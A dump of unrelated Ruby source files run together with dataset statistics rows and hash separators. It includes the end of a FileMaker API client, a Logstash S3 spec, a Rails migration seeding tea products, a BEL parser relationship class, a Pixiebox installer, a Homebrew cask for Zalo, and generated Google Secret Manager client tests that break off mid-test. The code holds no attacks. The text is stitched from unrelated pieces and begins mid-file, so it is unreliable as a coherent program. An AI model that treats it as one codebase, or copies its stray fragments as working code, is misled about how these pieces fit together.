# Mostly used by Filemaker::Api
# TODO: There must be tracing/instrumentation. CURL etc.
# Or performance metrics?
# Also we want to pass in timeout option so we can ignore timeout for really
# long requests
#
# @return [Array] response and request params Hash
def perform_request(action, args, options = {})
params = serialize_args(args)
.merge(expand_options(options))
.merge({ action => '' })
# Serialize the params for submission??
params.stringify_keys!
log_action(params)
# yield params if block_given?
response = get_typhoeus_connection(params)
http_status = "#{response.response_code}:#{response.return_code}"
case response.response_code
when 200
[response, params]
when 401
raise Errors::AuthenticationError,
"[#{http_status}] Authentication failed."
when 0
if response.return_code == :operation_timedout
raise Errors::HttpTimeoutError,
"[#{http_status}] Current timeout value is #{timeout}"
else
raise Errors::CommunicationError,
"[#{http_status}] Empty response."
end
when 404
raise Errors::CommunicationError,
"[#{http_status}] Not found"
when 302
raise Errors::CommunicationError,
"[#{http_status}] Redirect not supported"
when 502
raise Errors::CommunicationError,
"[#{http_status}] Bad gateway. Too many records."
else
msg = "Unknown response code = #{http_status}"
raise Errors::CommunicationError, msg
end
end
def handler_names
@connection.builder.handlers.map(&:name)
end
private
def get_typhoeus_connection(body)
request = Typhoeus::Request.new(
"#{url}#{endpoint}",
method: :post,
ssl_verifypeer: ssl_verifypeer,
ssl_verifyhost: ssl_verifyhost,
userpwd: "#{account_name}:#{password}",
body: body,
timeout: timeout || 0
)
request.run
end
# {"-db"=>"mydb", "-lay"=>"mylay", "email"=>"[email protected]", "updated_at": Date}
# Take Ruby type and serialize into a form FileMaker can understand
def serialize_args(args)
return {} if args.nil?
args.each do |key, value|
case value
when DateTime, Time
args[key] = value.strftime('%m/%d/%Y %H:%M:%S')
when Date
args[key] = value.strftime('%m/%d/%Y')
else
# Especially for range operator (...), we want to output as String
args[key] = value.to_s
end
end
args
end
def expand_options(options)
expanded = {}
options.each do |key, value|
case key
when :max
expanded['-max'] = value
when :skip
expanded['-skip'] = value
when :sortfield
if value.is_a? Array
msg = 'Too many sortfield, limit=9'
raise(Filemaker::Errors::ParameterError, msg) if value.size > 9
value.each_index do |index|
expanded["-sortfield.#{index + 1}"] = value[index]
end
else
expanded['-sortfield.1'] = value
end
when :sortorder
if value.is_a? Array
# Use :sortfield as single source of truth for array size
msg = 'Too many sortorder, limit=9'
raise(Filemaker::Errors::ParameterError, msg) if value.size > 9
options[:sortfield].each_index do |index|
expanded["-sortorder.#{index + 1}"] = value[index] || 'ascend'
end
else
expanded['-sortorder.1'] = value
end
when :lay_response
expanded['-lay.response'] = value
when :lop
expanded['-lop'] = value
when :modid
expanded['-modid'] = value
when :relatedsets_filter
expanded['-relatedsets.filter'] = value
when :relatedsets_max
expanded['-relatedsets.max'] = value
when :delete_related
expanded['-delete.related'] = value
when :script
if value.is_a? Array
expanded['-script'] = value[0]
expanded['-script.param'] = value[1]
else
expanded['-script'] = value
end
when :script_prefind
if value.is_a? Array
expanded['-script.prefind'] = value[0]
expanded['-script.prefind.param'] = value[1]
else
expanded['-script.prefind'] = value
end
when :script_presort
if value.is_a? Array
expanded['-script.presort'] = value[0]
expanded['-script.presort.param'] = value[1]
else
expanded['-script.presort'] = value
end
end
end
expanded
end
# TODO: Should we convert it to string so 'cURL' will work also?
def log_action(params)
case @config.log.to_s
when 'simple' then log_simple(params)
when 'curl' then log_curl(params)
when 'curl_auth' then log_curl(params, true)
end
end
def log_curl(params, has_auth = false)
full_url = "#{url}#{endpoint}?#{log_params(params)}"
curl_ssl_option = ''
auth = ''
curl_ssl_option = ' -k' unless ssl_verifypeer
auth = " -u #{account_name}:[FILTERED]" if has_auth
# warn 'Pretty print like so: `curl XXX | xmllint --format -`'
warn "curl -XGET '#{full_url}'#{curl_ssl_option} -i#{auth}"
end
def log_simple(params)
warn colorize('48;2;0;0;255', "#{url}#{endpoint}?#{log_params(params)}")
end
def log_params(params)
params.map do |key, value|
"#{CGI.escape(key.to_s)}=#{CGI.escape(value.to_s)}"
end.join('&')
end
def colorize(color, message)
"\e[#{color}m#{message}\e[0m"
end
end
end
| 29.883929 | 80 | 0.578428 |
d52e651d17ef740eaa4d2ba856dea2b7eaea727f | 1,465 | # encoding: utf-8
require_relative "../spec_helper"
require "logstash/outputs/s3"
require "logstash/codecs/line"
require "stud/temporary"
describe "Upload current file on shutdown", :integration => true do
include_context "setup plugin"
let(:options) { main_options }
let(:size_file) { 1000000 }
let(:time_file) { 100000 }
let(:number_of_events) { 5000 }
let(:batch_size) { 125 }
let(:event_encoded) { "Hello world" }
let(:batch) do
b = {}
number_of_events.times do
event = LogStash::Event.new({ "message" => event_encoded })
b[event] = "#{event_encoded}\n"
end
b
end
before do
clean_remote_files(prefix)
subject.register
subject.multi_receive_encoded(batch)
subject.close
end
it "creates a specific quantity of files" do
# Since we have really big value of time_file and size_file
expect(bucket_resource.objects(:prefix => prefix).count).to eq(1)
end
it "Persists all events" do
download_directory = Stud::Temporary.pathname
FileUtils.rm_rf(download_directory)
FileUtils.mkdir_p(download_directory)
counter = 0
bucket_resource.objects(:prefix => prefix).each do |object|
target = File.join(download_directory, "#{counter}.txt")
object.get(:response_target => target)
counter += 1
end
expect(Dir.glob(File.join(download_directory, "**", "*.txt")).inject(0) { |sum, f| sum + IO.readlines(f).size }).to eq(number_of_events)
end
end
| 28.173077 | 140 | 0.685324 |
ff7525438fdec53132eb1a45ffa176bab6fa80b9 | 206 | require File.expand_path('../fixtures/classes', __FILE__)
describe "Singleton#clone" do
it "is prevented" do
lambda { SingletonSpecs::MyClass.instance.clone }.should raise_error(TypeError)
end
end
| 25.75 | 83 | 0.757282 |
f800ccdf3fd321b75aeacda8aa8aa89f25496099 | 1,415 | class AddProduct < ActiveRecord::Migration[6.0]
def change
Product.create :title => "Ассам цветок весны",
:description => "Полностью ферментированный индийский черный чай из крупных цельных листьев. Рекомендован к употреблению в первой половине дня - бодрит и тонизирует. Сочетается с молоком и сахаром.",
:price => 651,
:weigth => "250 г.",
:is_china => false,
:is_india => true,
:is_best_offer => false,
:path_to_image => '/images/assam_cvetok_vesni.jpg'
Product.create :title => "Ассам мокалбари",
:description => "Черный индийский чай высшего качества. Произведен на небольшой плантации Мокалбари, которая принадлежит семье потомственных чаепроизводителей. Состоит из среднего цельного листа, обладает высоким содержанием типсов. Сочетается с молоком, сахаром и медом.",
:price => 1222,
:weigth => "250 г.",
:is_china => false,
:is_india => true,
:is_best_offer => true,
:path_to_image => '/images/assam_mokalbari.jpg'
Product.create :title => "Кимун",
:description => "Китайский красный чай, его также называют «цихун». Данный сорт неизменно входит в список Десять Знаменитых Чаев Китая, а также является любимым сортом британской королевской семьи. Недаром он получили эпитет «Император красных чаёв».",
:price => 1308,
:weigth => "250 г.",
:is_china => true,
:is_india => false,
:is_best_offer => false,
:path_to_image => '/images/kimun.jpg'
end
end
| 42.878788 | 275 | 0.725088 |
3361a823e885a609b1c0d650956b822f38c6c23c | 73 | # frozen_string_literal: true
module Kubo
VERSION = "0.0.2.pre.1"
end
| 12.166667 | 29 | 0.712329 |
6a8fd883b9a7e028e44d79b1ffbeb945fb8f389f | 1,323 | require_relative '../../version2_0'
require_relative '../../relationship'
module BELParser
module Language
module Version2_0
module Relationships
# PrognosticBiomarkerFor: +A prognosticBiomarkerFor P+ -
# For term A and process term P, +A prognosticBiomarkerFor P+
# indicates that changes in or detection of A is used in some
# way to be a prognostic biomarker for the subsequent development
# of pathology or biological process P.
class PrognosticBiomarkerFor
extend Relationship
SHORT = :prognosticBiomarkerFor
LONG = :prognosticBiomarkerFor
DESCRIPTION = <<-DOC
PrognosticBiomarkerFor: +A prognosticBiomarkerFor P+ -
For term A and process term P, +A prognosticBiomarkerFor P+
indicates that changes in or detection of A is used in some
way to be a prognostic biomarker for the subsequent development
of pathology or biological process P.
DOC
def self.short
SHORT
end
def self.long
LONG
end
def self.description
DESCRIPTION
end
def self.deprecated?
true
end
def self.directed?
true
end
end
end
end
end
end
| 25.941176 | 73 | 0.61678 |
18435476c3d810d6e623703235a66b813e853260 | 67 | class <%= class_name %> < ActiveRecord::Base
acts_as_executor
end | 22.333333 | 44 | 0.746269 |
08a3bf3337bf96c458d288f174d2c9ed56b07162 | 183 | require "great_pretender/config"
require "great_pretender/controller"
require "great_pretender/version"
module GreatPretender
end
require "great_pretender/engine" if defined? Rails
| 20.333333 | 50 | 0.84153 |
e871980df0b6d8de51c307726009e8a961275d7a | 347 | # frozen_string_literal: true
class FakeUserModel
def self.finder
end
end
class FakeController
include Keycard::ControllerMethods
attr_reader :request, :notary, :session
def initialize(request, session, notary)
@request = request
@session = session
@notary = notary
end
def reset_session
session.clear
end
end
| 15.086957 | 42 | 0.729107 |
ac8cd8a41b8974d3f0ab790d39cee1a1892d46e0 | 1,373 | module Pixiebox
class System
include Utils::Visitable
include Utils::Output
attr_reader :os
def initialize(os)
@os = os
end
def install
accept(Commands::StartInstall.new)
accept(Commands::GetRootPermission.new)
accept(Commands::DownloadDocker.new)
accept(Commands::InstallDocker.new)
accept(Commands::InstallConfig.new)
accept(Commands::UpdatePackages.new)
accept(Commands::SetupShell.new)
accept(Commands::FinishInstall.new)
accept(Commands::ReloadShell.new)
rescue StandardError => e
display_error e
exit 1
end
def uninstall
accept(Commands::StartUninstall.new)
accept(Commands::RemoveSetupShell.new)
accept(Commands::FinishUninstall.new)
rescue StandardError => e
display_error e
exit 1
end
def start
accept(Commands::Start.new)
rescue StandardError => e
display_error e
exit 1
end
def stop
accept(Commands::Stop.new)
rescue StandardError => e
display_error e
exit 1
end
def restart
accept(Commands::Restart.new)
rescue StandardError => e
display_error e
exit 1
end
def ssh(service)
accept(Commands::SshInstance.new(service))
rescue StandardError => e
display_error e
exit 1
end
end
end
| 19.614286 | 48 | 0.644574 |
1d10a0936fc757999953f932a5e0b1a21c1d7943 | 640 | cask 'zalo' do
version '19.7.1a'
sha256 '04c6734460039851cda69eb9ed9d79bfa57f9e225a8249af88b7b36dfa80080f'
# res-download-pc-te-vnno-zn-3.zadn.vn/mac was verified as official when first introduced to the cask
url "https://res-download-pc-te-vnno-zn-3.zadn.vn/mac/ZaloSetup-#{version}.dmg"
name 'Zalo'
homepage 'https://zalo.me/'
app 'Zalo.app'
zap trash: [
'~/Library/Application Support/Zalo',
'~/Library/Application Support/ZaloPC',
'~/Library/Preferences/com.vng.zalo.*.plist',
'~/Library/Saved Application State/com.vng.zalo.savedState',
]
end
| 33.684211 | 103 | 0.654688 |
e2eed2ee41b216160fc3bfa043ee09a8772904a8 | 38,778 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "helper"
require "gapic/grpc/service_stub"
require "google/cloud/secrets/v1beta1/service_pb"
require "google/cloud/secrets/v1beta1/service_services_pb"
require "google/cloud/secret_manager/v1beta1/secret_manager_service"
class ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::ClientTest < Minitest::Test
class ClientStub
attr_accessor :call_rpc_count, :requests
def initialize response, operation, &block
@response = response
@operation = operation
@block = block
@call_rpc_count = 0
@requests = []
end
def call_rpc *args, **kwargs
@call_rpc_count += 1
@requests << @block&.call(*args, **kwargs)
yield @response, @operation if block_given?
@response
end
end
def test_list_secrets
# Create GRPC objects.
grpc_response = ::Google::Cloud::SecretManager::V1beta1::ListSecretsResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
parent = "hello world"
page_size = 42
page_token = "hello world"
list_secrets_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :list_secrets, name
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::ListSecretsRequest, request
assert_equal "hello world", request["parent"]
assert_equal 42, request["page_size"]
assert_equal "hello world", request["page_token"]
refute_nil options
end
Gapic::ServiceStub.stub :new, list_secrets_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.list_secrets({ parent: parent, page_size: page_size, page_token: page_token }) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use named arguments
client.list_secrets parent: parent, page_size: page_size, page_token: page_token do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.list_secrets ::Google::Cloud::SecretManager::V1beta1::ListSecretsRequest.new(parent: parent, page_size: page_size, page_token: page_token) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.list_secrets({ parent: parent, page_size: page_size, page_token: page_token }, grpc_options) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.list_secrets(::Google::Cloud::SecretManager::V1beta1::ListSecretsRequest.new(parent: parent, page_size: page_size, page_token: page_token), grpc_options) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, list_secrets_client_stub.call_rpc_count
end
end
def test_create_secret
# Create GRPC objects.
grpc_response = ::Google::Cloud::SecretManager::V1beta1::Secret.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
parent = "hello world"
secret_id = "hello world"
secret = {}
create_secret_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :create_secret, name
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::CreateSecretRequest, request
assert_equal "hello world", request["parent"]
assert_equal "hello world", request["secret_id"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::SecretManager::V1beta1::Secret), request["secret"]
refute_nil options
end
Gapic::ServiceStub.stub :new, create_secret_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.create_secret({ parent: parent, secret_id: secret_id, secret: secret }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.create_secret parent: parent, secret_id: secret_id, secret: secret do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.create_secret ::Google::Cloud::SecretManager::V1beta1::CreateSecretRequest.new(parent: parent, secret_id: secret_id, secret: secret) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.create_secret({ parent: parent, secret_id: secret_id, secret: secret }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.create_secret(::Google::Cloud::SecretManager::V1beta1::CreateSecretRequest.new(parent: parent, secret_id: secret_id, secret: secret), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, create_secret_client_stub.call_rpc_count
end
end
def test_add_secret_version
# Create GRPC objects.
grpc_response = ::Google::Cloud::SecretManager::V1beta1::SecretVersion.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
parent = "hello world"
payload = {}
add_secret_version_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :add_secret_version, name
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::AddSecretVersionRequest, request
assert_equal "hello world", request["parent"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::SecretManager::V1beta1::SecretPayload), request["payload"]
refute_nil options
end
Gapic::ServiceStub.stub :new, add_secret_version_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.add_secret_version({ parent: parent, payload: payload }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.add_secret_version parent: parent, payload: payload do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.add_secret_version ::Google::Cloud::SecretManager::V1beta1::AddSecretVersionRequest.new(parent: parent, payload: payload) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.add_secret_version({ parent: parent, payload: payload }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.add_secret_version(::Google::Cloud::SecretManager::V1beta1::AddSecretVersionRequest.new(parent: parent, payload: payload), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, add_secret_version_client_stub.call_rpc_count
end
end
def test_get_secret
# Create GRPC objects.
grpc_response = ::Google::Cloud::SecretManager::V1beta1::Secret.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
name = "hello world"
get_secret_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :get_secret, name
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::GetSecretRequest, request
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, get_secret_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.get_secret({ name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.get_secret name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.get_secret ::Google::Cloud::SecretManager::V1beta1::GetSecretRequest.new(name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.get_secret({ name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.get_secret(::Google::Cloud::SecretManager::V1beta1::GetSecretRequest.new(name: name), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, get_secret_client_stub.call_rpc_count
end
end
def test_update_secret
# Create GRPC objects.
grpc_response = ::Google::Cloud::SecretManager::V1beta1::Secret.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
secret = {}
update_mask = {}
update_secret_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :update_secret, name
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::UpdateSecretRequest, request
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::SecretManager::V1beta1::Secret), request["secret"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Protobuf::FieldMask), request["update_mask"]
refute_nil options
end
Gapic::ServiceStub.stub :new, update_secret_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.update_secret({ secret: secret, update_mask: update_mask }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.update_secret secret: secret, update_mask: update_mask do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.update_secret ::Google::Cloud::SecretManager::V1beta1::UpdateSecretRequest.new(secret: secret, update_mask: update_mask) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.update_secret({ secret: secret, update_mask: update_mask }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.update_secret(::Google::Cloud::SecretManager::V1beta1::UpdateSecretRequest.new(secret: secret, update_mask: update_mask), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, update_secret_client_stub.call_rpc_count
end
end
def test_delete_secret
# Create GRPC objects.
grpc_response = ::Google::Protobuf::Empty.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
name = "hello world"
delete_secret_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :delete_secret, name
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::DeleteSecretRequest, request
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, delete_secret_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.delete_secret({ name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.delete_secret name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.delete_secret ::Google::Cloud::SecretManager::V1beta1::DeleteSecretRequest.new(name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.delete_secret({ name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.delete_secret(::Google::Cloud::SecretManager::V1beta1::DeleteSecretRequest.new(name: name), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, delete_secret_client_stub.call_rpc_count
end
end
def test_list_secret_versions
# Create GRPC objects.
grpc_response = ::Google::Cloud::SecretManager::V1beta1::ListSecretVersionsResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
parent = "hello world"
page_size = 42
page_token = "hello world"
list_secret_versions_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :list_secret_versions, name
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::ListSecretVersionsRequest, request
assert_equal "hello world", request["parent"]
assert_equal 42, request["page_size"]
assert_equal "hello world", request["page_token"]
refute_nil options
end
Gapic::ServiceStub.stub :new, list_secret_versions_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.list_secret_versions({ parent: parent, page_size: page_size, page_token: page_token }) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use named arguments
client.list_secret_versions parent: parent, page_size: page_size, page_token: page_token do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.list_secret_versions ::Google::Cloud::SecretManager::V1beta1::ListSecretVersionsRequest.new(parent: parent, page_size: page_size, page_token: page_token) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.list_secret_versions({ parent: parent, page_size: page_size, page_token: page_token }, grpc_options) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.list_secret_versions(::Google::Cloud::SecretManager::V1beta1::ListSecretVersionsRequest.new(parent: parent, page_size: page_size, page_token: page_token), grpc_options) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, list_secret_versions_client_stub.call_rpc_count
end
end
def test_get_secret_version
# Create GRPC objects.
grpc_response = ::Google::Cloud::SecretManager::V1beta1::SecretVersion.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
name = "hello world"
get_secret_version_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :get_secret_version, name
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::GetSecretVersionRequest, request
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, get_secret_version_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.get_secret_version({ name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.get_secret_version name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.get_secret_version ::Google::Cloud::SecretManager::V1beta1::GetSecretVersionRequest.new(name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.get_secret_version({ name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.get_secret_version(::Google::Cloud::SecretManager::V1beta1::GetSecretVersionRequest.new(name: name), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, get_secret_version_client_stub.call_rpc_count
end
end
def test_access_secret_version
# Create GRPC objects.
grpc_response = ::Google::Cloud::SecretManager::V1beta1::AccessSecretVersionResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
name = "hello world"
access_secret_version_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :access_secret_version, name
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::AccessSecretVersionRequest, request
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, access_secret_version_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.access_secret_version({ name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.access_secret_version name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.access_secret_version ::Google::Cloud::SecretManager::V1beta1::AccessSecretVersionRequest.new(name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.access_secret_version({ name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.access_secret_version(::Google::Cloud::SecretManager::V1beta1::AccessSecretVersionRequest.new(name: name), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, access_secret_version_client_stub.call_rpc_count
end
end
def test_disable_secret_version
# Create GRPC objects.
grpc_response = ::Google::Cloud::SecretManager::V1beta1::SecretVersion.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
name = "hello world"
disable_secret_version_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :disable_secret_version, name
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::DisableSecretVersionRequest, request
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, disable_secret_version_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.disable_secret_version({ name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.disable_secret_version name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.disable_secret_version ::Google::Cloud::SecretManager::V1beta1::DisableSecretVersionRequest.new(name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.disable_secret_version({ name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.disable_secret_version(::Google::Cloud::SecretManager::V1beta1::DisableSecretVersionRequest.new(name: name), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, disable_secret_version_client_stub.call_rpc_count
end
end
def test_enable_secret_version
# Create GRPC objects.
grpc_response = ::Google::Cloud::SecretManager::V1beta1::SecretVersion.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
name = "hello world"
enable_secret_version_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :enable_secret_version, name
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::EnableSecretVersionRequest, request
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, enable_secret_version_client_stub do
# Create client
